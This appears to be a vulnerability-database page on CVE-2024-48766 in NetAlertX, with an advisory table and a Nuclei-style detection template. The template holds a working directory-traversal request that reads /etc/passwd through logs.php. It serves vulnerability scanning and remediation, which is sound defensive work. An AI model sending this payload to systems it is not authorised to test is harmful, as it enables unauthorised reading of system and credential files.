| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| The vulnerability in the security.php script of the NetAlert X intrusion notification network infrastructure allows a perpetrator to read arbitrary files. | 11 Mar 202500:00 | – | bdu_fstec | |
| CVE-2024-48766 | 17 Feb 202510:25 | – | circl | |
| NetAlertX 安全漏洞 | 13 May 202500:00 | – | cnnvd | |
| CVE-2024-48766 | 13 May 202500:00 | – | cve | |
| CVE-2024-48766 | 13 May 202500:00 | – | cvelist | |
| CVE-2024-48766 | 13 May 202516:15 | – | nvd | |
| PT-2024-41092 · Netalertxnetalertx +3 · * +1 | 28 Sep 202400:00 | – | ptsecurity | |
| Metasploit Weekly Wrap-Up: 02/28/2025 | 28 Feb 202514:54 | – | rapid7blog | |
| CVE-2024-48766 | 15 May 202500:10 | – | redhatcve | |
| VulnCheck KEV: CVE-2024-48766 | 12 May 202500:00 | – | vulncheck_kev |
id: CVE-2024-48766
info:
name: NetAlert X - Arbitary File Read
author: s4e-io
severity: critical
description: |
A directory traversal vulnerability has been identified in NetAlertX versions v24.7.18 - v24.9.12.
impact: |
This vulnerability allows remote attackers to list directories on the affected system. Successful exploitation could enable unauthorized users to explore the system’s internal structure.
remediation: |
Fixed in v24.10.12
reference:
- https://advisories.checkpoint.com/defense/advisories/public/2025/cpai-2024-1358.html
- https://github.com/rapid7/metasploit-framework/pull/19881
- https://github.com/jokob-sk/NetAlertX
classification:
cve-id: CVE-2024-48766
cwe-id: CWE-22
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
cvss-score: 8.6
epss-score: 0.68076
epss-percentile: 0.9924
cpe: cpe:2.3:a:netalertx:netalertx:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: jokob-sk
product: netalertx
fofa-query: "NetAlert X"
tags: cve,cve2024,netalertx,lfi,vkev,vuln
variables:
filename: "{{rand_base(6)}}"
http:
- raw:
- |
POST /php/components/logs.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
items=[{"buttons":[{"labelStringCode":"Maint_PurgeLog","event":"logManage(app.log, cleanLog)"},{"labelStringCode":"Maint_RestartServer","event":"askRestartBackend()"}],"fileName":"{{filename}}","filePath":"../../../../..//etc/passwd","textAreaCssClass":"logs"}]
matchers:
- type: dsl
dsl:
- "regex('root:.*:0:0:', body)"
- 'contains(body, "Purge log")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100e326c21e0337ab00d6074d8e429cbd24b6b4469ca142a29a82a01ab33a9bfc71022100cdb31443eac5fcb82991b49e342503e3fbd8211c3576eaef6683cacdbf3f905e:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation